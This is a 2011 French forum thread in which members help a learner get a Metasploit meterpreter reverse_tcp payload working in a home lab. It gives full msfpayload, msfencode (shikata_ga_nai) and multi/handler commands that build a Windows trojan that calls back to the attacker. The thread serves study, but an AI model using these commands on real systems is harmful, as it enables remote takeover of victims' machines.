Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 21-12-2011 14:12:21

voxpopuli
Nouveau membre
Inscription : 21-12-2011
Messages : 6

probleme avec msfpayload

Bien le bonjour la communauté !

Je suis en train de tenter d'apprendre a me servir de metasploit sans ses interfaces graphiques mais je tombe face a un soucis. Côté configuration: réseau local avec Ubuntu et Windows XP relié par pont réseau au wifi (les machines se ping sans problème et possède des adresses IP correcte).
Voici mes commandes ainsi que ce qu'elles sont censées faire:

Création du .exe

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=46666 RPORT=46666 > JeSuisPasGentil.exe

Aucune erreur n'est signalé.


Lancement du serveur metasploit en écoute

msfcli multi/handler LHOST=192.168.1.7 LPORT=46666 PAYLOAD=windows/meterpreter/reverse_tcp E

Le serveur se lance bien et n'affiche aucune erreur:

LHOST => 192.168.1.7
LPORT => 46666
PAYLOAD => windows/meterpreter/reverse_tcp
[*] Started reverse handler on 192.168.1.7:46666 
[*] Starting the payload handler...

Après je tape le .exe sur la machine virtuelle (windows XP SP2 type lsd) et le lance. Un shell se lance bien sur la machine virtuelle, mais rien d'autre ne se passe (la connexion n'arrive pas jusqu'au serveur). Ne voyant pas d'où peut provenir mon erreur, je me demande si ce ne serait pas dû a Ubuntu.

Merci d'avance pour votre aide.


Cordialement.

VoxPopuli

Dernière modification par voxpopuli (21-12-2011 14:52:28)

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 21-12-2011 14:29:26

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : probleme avec msfpayload

Ca ressemble à un problème de pare-feu, travailler en machines virtuelles (même via un pont réseau) ne facilite pas les choses...

Commence par vérifier que tu peux contacter le port 46666 de ta machine attaquante depuis ta machine victime. Par exemple tu lances le payload handler que tu laisses en attente, et depuis la machine victime tu essaies un telnet sur l'IP/port en question. Ca serait plus efficace de faire ça avec Netcat ou Ncat, mais il faut les installer alors que Telnet est déjà dispo wink
Tu peux aussi regarder avec Wireshark sur la machine victime à quoi ressemble le trafic sur le port 46666.

Une dernière chose : on est bien d'accord que tu n'as pas un antivirus/pare-feu actif sur la machine victime ?!

Hors Ligne

#3 21-12-2011 14:56:36

voxpopuli
Nouveau membre
Inscription : 21-12-2011
Messages : 6

Re : probleme avec msfpayload

Oui je confirme, aucun pare-feu sur la machine virtuelle (pare-feu windows désactivé et pas de pare-feu ni AV additionnel).
Je viens de faire une connexion avec telnet sur le serveur attaquant, les deux semblent bien réagir (le telnet m'affiche le code de se qu'il reçois, un art fort abstrait ^^, tandis que le serveur m'indique qu'il à envoyé sa payload).

Je vais tenter de forger le fichier infecté sur Backtrack pour voir si ce ne serait pas un problème d'incompatibilité avec Ubuntu (se qui serait étrange vu que j'ai déjà fais des test avec msfconsole et armitage et qu'ils s'étaient montré concluant).

PS: en parlant de Netcat, tu aurais une idée d'où je peux le trouver en version saine pour windows? Cet outil est vraiment génial pour le bidouillage.

Dernière modification par voxpopuli (21-12-2011 15:04:33)

Hors Ligne

#4 21-12-2011 15:03:43

koala
Membre d'honneur
Lieu : In the sky
Inscription : 03-09-2010
Messages : 2 316

Re : probleme avec msfpayload

Que te renvois le résultat de la commande telnet exactement?

Je vais tenter de forger le fichier infecté sur Backtrack pour voir si ce ne serait pas un problème d'incompatibilité avec Ubuntu (se qui serait étrange vu que j'ai déjà fais des test avec msfconsole et armitage et qu'ils s'étaient montré concluant).

En effet je pense pas que ce soit ça pour avoir utilisé metasploit sur unbutu, quand tu dis "forger le fichier infecté" tu comptes encoder ton .exe ou le modifier avec d'autres techniques?

Hors Ligne

#5 21-12-2011 15:14:39

voxpopuli
Nouveau membre
Inscription : 21-12-2011
Messages : 6

Re : probleme avec msfpayload

A la base, j'ai voulu tester msfpayload et msfencode avec la commande suivante:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=46666 C EXITFUNC=seh | msfencode -t exe -c 15 -e x86/shikata_ga_nai | msfencode -t exe -e x86/call4_dword_xor -c 10 | msfencode -e x86/countdown -c 10 -t exe > test.exe

Mais comme cela ne marchait pas, j'ai voulu utiliser msfpayload seul afin de trouver où se situe le problème.

Avec le telnet, le serveur réagis:

[*] Started reverse handler on 192.168.1.7:46666 
[*] Starting the payload handler...
[*] Sending stage (752128 bytes) to 192.168.1.3

Euh,pour la commande telnet, je crain que se ne soit trop long pour poster  tout (elle a dépassé la centaine de ligne après a peine 3 secondes ^^). Pour résumer, la fin de la fenêtre telnet affiche cela

                   :¶:?:$:,:4:<:D:L:T:\:d:l:t:|:ä:ö:£:ñ:Œ:Š:+:-:Š:È:_:õ:ý:¶:³:?;



;¶;?;$;,;4;<;D;L;T;\;d;l;t;|;ä;î;ö;£;ñ;Œ;Š;+;-;Š;È;_;õ;¶;³;?<

                                                             <¶<?<$<,<4<<<D<L<T<

\<d<l<t<|<ä<î<ö<£<ñ<Œ<Š<+<-<Š<È<_<õ<ý<¶<³<?=

                                            =¶=?=$=,=<=D=L=T=\=d=l=t=|=ä=î=ö=£=ñ



=Œ=Š=+=Š=È=_=õ=ý=¶=³=?>

                       >¶>?>$>,>4><>D>L>T>\>d>l>t>|>ä>î>ö>£>Œ>Š>+>->Š>È>_>õ>ý>¶³



>

 ?¶???$?,?4?<?D?L?T?\?d?l?t?|?ä?î?ö?£?ñ?Œ?Š?+?-?Š?È?_?õ?ý?¶?³?ð

                                                               H??0

                                                                   [email protected]

\0p0t0ê0î0á0ñ0©0+0ð0È0¶0°0³1

                            1?101D1H1L1P1T1X1d1h1l1p1t1Ç1ä1î1É1ö1ÿ1£1á1ñ1¿1Œ1Š1Š



1T2X2\2`2l2p2t2x2ä2ê2á2ñ2¿2Œ2Š2Š2©2+2+2-2+2Š2ð2È2Ï2_2Ó2õ2Þ2ý2­2¶2°2³23?3

                                                                        3?3¶33?3

 3$3(3,30383<3?4¶4 [email protected]\4d4h4p4t4|4Ç4ê4î4ñ4¿4Š4Š4+4+4+4Š4È4Ï4Ó4õ4ý­



4°4³4¶55 5$5,50585<5D5H5P5T5\5`5h5l5t5x5ö5ÿ5 6,686D6P6\6h6t6Ç6î6ÿ6ñ6Š6+6+6È6Ó6ý°



6?7?7?7([email protected]|7ê7ö7á7Œ7©7-7ð7_7Þ7¶78

                                            88$808<8H8_9Ó9õ9Þ9ý9­9¶9°9³9:?:

                                                                           :?::?

: :$:(:,:0:4:8:<:@:D:H:L:P:T:X:\:`:d:h:l:p:t:x:|:Ç:ä:ê:î:É:ö:ÿ:£:ñ:¿:Š>Š>©>+>+>-



>+>Š>ð>È>Ï>_>Ó>õ>Þ>ý>­>¶>°>³>???

                                ???¶???? ?(?,?8?<?ä?È?Ï?Ó

                                                         h 0p0t0

                                                                1?1X1¿1Œ1D2H2Ó2õ



2|3Ç34?4Š4©4P5T5ý5­5h7t7Ç7î7ÿ7ñ7Š7+7+7È7Ï7d8h8<[email protected]_9Ó9õ9Þ9ý9­9¶9°9³9:­

                                                                        ?Ç1ê1H5T

5\5d5l5t5|5ä5î5ö5£5ñ5Œ5Š5+5-5Š5È5_5õ5ý5¶5³5?6`6d6h6l6p6t6x6|6Ç6ä6ê6î6©:Š;<(<8<H<

X<|<ê<î<É<ö<ÿ<á<ñ<P=T=`>d>h>l>p>t>x>|>Ç>ä>ê>î>É>ö>ÿ>£>á>ñ>¿>Œ>Š>Š>©>+>+>->+>Š>ðÈ



>Ï>_>Ó>õ>Þ>ý>­>¶>°>³>???

                        ?á?ñ?¿?Œ?Š?Š?©?+?+?-?+?Š?ð?È?Ï?_?Ó?õ?Þ?ý?­?¶?°?³?

                                                                         L0?0

                                                                             0?0

¶00?0 0$0(0,0004080<[email protected]`0h0l0p0t0x0|0Ç0ä0ê0î0ÿ0

Dernière modification par voxpopuli (21-12-2011 15:24:38)

Hors Ligne

#6 21-12-2011 15:57:08

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : probleme avec msfpayload

OK, donc la connexion passe, c'est déjà ça... Du coup je sais pas trop pourquoi l'attaque ne fonctionne pas, tu saurais essayer avec msfconsole plutôt que msfcli ? Tu devras taper les arguments 1 à 1 donc ça devrait donner ceci :

- use multi/handler
- set PAYLOAD windows/meterpreter/reverse_tcp
- set LHOST 192.168.1.7
- set LPORT 46666
- exploit

Au passage, je pense que j'ai trouvé d'où vient l'erreur : quand tu génères ton trojan, tu dois utiliser RHOST pas LHOST. LHOST correspond à l'hôte Local sur lequel il faut écouter, mais dans le cas d'une connexion en reverse c'est la victime qui démarre la connexion vers le serveur ; il faut donc spécifier l'adresse RHOST (R comme Remote) du serveur à joindre wink
Essaie avec cette commande :

msfpayload windows/meterpreter/reverse_tcp RHOST=192.168.1.7 LPORT=46666 RPORT=46666 > JeSuisPasGentil_EtEnPlusJeFonctionne.exe

(je pense que le LPORT ne sert à rien mais bon, il ne pose pas de problème non plus)

Pour netcat, cherche le fichier "nc111nt" sur Google, c'est la version 1.11 de Netcat pour Windows, tu devrais même pouvoir retrouver des sources VisualC++ si tu veux le recompiler toi-même smile Perso je préfère travailler avec Ncat, qui est une amélioration par l'équipe de Nmap. Il est plus lourd mais je le trouve plus complet, tu peux le télécharger en même temps que tous les binaires Win32 sur le site de Nmap wink
--> Ncat, le successeur de Netcat/Cryptcat

@koala : telnet va lui renvoyer le payload binaire mais affiché comme de l'ASCII donc on ne saura rien en déduire smile Surtout que si le payload fait 300k, on aura 300.000 caractères mais qui n'ont aucun sens smile
Au passage, je pense que oui il peut y avoir des différences entre Metasploit sur Ubuntu et sur BackTrack : Metasploit est très sensible à la version de Ruby utilisée, tout est bien affiné sous BackTrack (encore que...), mais ce n'est pas forcément le cas sous Ubuntu !

Hors Ligne

#7 21-12-2011 16:14:22

voxpopuli
Nouveau membre
Inscription : 21-12-2011
Messages : 6

Re : probleme avec msfpayload

Je viens de tester ta commande. Quand je ne met pas LHOST, j'ai l'erreur suivante:

Error generating payload: The following options failed to validate: LHOST.

J'avais déjà testé en rempalcant RHOST par LHOST (je m'étais fais la même remarque), mais l'erreur m'a fais pensé que je me gourais. Par contre, le fichier a bien été créé, mais n'est pas bon du tout. Windows me dis que le programme n'est pas une application valide, et la commande file me répond que le programme est vide.

[email protected]:/home/voxpopuli/programmation/securite# file JeSuisPasGentil_EtEnPlusJeFonctionne.exe
JeSuisPasGentil_EtEnPlusJeFonctionne.exe: empty

Je vais tester avec backtrack voir s'il n'y aurait pas un bug lors de la génération du payload (j'avais lu quelques part que les encodeurs buggaient sur Ubuntu), mais mes pauvres 2Go de RAM vont encore être dépassé ^^.


Edit:

Et bien j'ai la même erreur sur Backtrack, la commande réclame LHOST pour fonctionner. Pour tester, j'ai mis LHOST=0.0.0.0, LHOST=adresse_IP_victime, rien n'y fais. De plus la commande file me répond que le fichier est de type data:

[email protected]:/home/voxpopuli/programmation/securite# sudo file JeSuisPasGentil_EtEnPlusJeFonctionne.exe 
JeSuisPasGentil_EtEnPlusJeFonctionne.exe: data

Vraiment étrange.

Dernière modification par voxpopuli (21-12-2011 17:36:42)

Hors Ligne

#8 21-12-2011 19:58:27

Fuji
Membre Irremplaçable
Lieu : Saint Script-sur-Shell
Inscription : 13-12-2010
Messages : 783

Re : probleme avec msfpayload

Essaies tout simplement avec la commande suivante :

./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=46666 x > JeSuisTresGentil.exe

Ensuite tu lui donne des droits d’exécution:

chmod +x JeSuisTresGentil.exe

Dernière modification par Fuji (21-12-2011 19:59:56)

Hors Ligne

#9 21-12-2011 20:57:32

voxpopuli
Nouveau membre
Inscription : 21-12-2011
Messages : 6

Re : probleme avec msfpayload

Ahhhh, niquel ça marche !
Il me manquait l'option "x". Peux-tu me dire son utilité stp?

Pour le chmod +x, il n'est utile que si je souhaite exécuter un script sur linux, hors dans ce cas le .exe doit être exécuté sur windows smile

Dernière modification par voxpopuli (21-12-2011 21:01:34)

Hors Ligne

#10 21-12-2011 23:28:44

antares145
Membre d'honneur
Inscription : 29-09-2009
Messages : 5 199
Site Web

Re : probleme avec msfpayload

Arf, le c*n chui passé à côté de ça hmm Bien vu Fuji 20

Le dernier argument de la commande msfpayload sert à définir le type de sortie, c'est expliqué dans l'aide (msfpayload -h) :
- X pour un eXécutable (windows)
- R pour une sortie brute (Raw) que tu rediriges par exemple vers msfencode
- C pour du code C (je crois)
- P pour un script Perl
- RUB pour un script Ruby
- J pour du javascript
- D pour une DLL Windows
- V pour du VisualBasic
- W pour "war" mais je ne sais pas à quoi ça correspond, un lien avec wargame peut-être...

Comme tu ne précisais pas de type, je suppose qu'il sortait du RAW par défaut donc évidemment ce n'était pas exécutable... wink

Hors Ligne

#11 22-12-2011 13:57:21

voxpopuli
Nouveau membre
Inscription : 21-12-2011
Messages : 6

Re : probleme avec msfpayload

Je vous remercie grandement de m'avoir aidé a solutionner mon problème wink

Hors Ligne

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

Sujets similaires

Pied de page des forums


Le coin des bonnes affaires, achats informatiques:


|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   


Server Stats - [ Generated in 0.04 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]